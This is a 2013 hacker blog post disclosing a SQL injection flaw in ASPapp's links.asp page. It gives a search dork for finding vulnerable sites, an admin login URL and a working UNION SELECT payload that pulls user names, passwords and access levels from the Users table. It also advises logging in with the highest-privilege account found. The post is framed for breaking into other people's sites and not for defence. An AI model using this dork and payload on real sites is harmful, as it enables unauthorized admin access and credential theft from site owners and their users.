Translate

Senin, 04 November 2013

0 ASPapp (links.asp CatId) Remote SQL Injection Vulnerability

Date: Senin, 04 November 2013 17.28
Category:
Author: Banj4rnymouz
Share:
Responds: 0 Comment
Banj4rnymouz@gmail.com
..###########    
..#...##     
..#.##.##
..#..### Banj4rnymouz
..#..###    
..#.##.##
..#../#...##
..##./....##
 
-----------------Banj4rnymouz--------------------------------------
                                                
--------- www.banj4rnymouz.blogspot.com.com-------------------------------
 
----------www.xcorpitx-hack.com------------------------------
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability
-------------------------------------------------
 you ll see lots of users like this but  accesslevel ll help you for see admin
-------------------------------------------------------------
----------------example--------------------------------------
 
Links › guest  ›  12    › 1     user
Links › editor › editor › 2     materator
Links › manager› manager› 2     materator
Links › surco  › surco  › 2     materator
Links › admin  › admin  › 3     admin
Links › ovivas › ovivas › 4     super-admin----- we  ll login with this username
-------------------------------------------------------------
 
-------------------------------------------------------------
i mean.. when you see  big number  4 or 5  you can  use this username and password
-------------------------------------------------------------
 
-------
dork   -  ''links.asp?CatId''
-------
exploit-
-------
admin login-
-------
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F
-------
-------------------------------------------------------------
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users

Artikel Terkait :



:)) ;));;) :D ;) :p :(( :) :( :X =((:-o :-/ :-* :| 8-} :)] ~x( :-t b-(:-L x( :-q =))

Posting Komentar

Visitor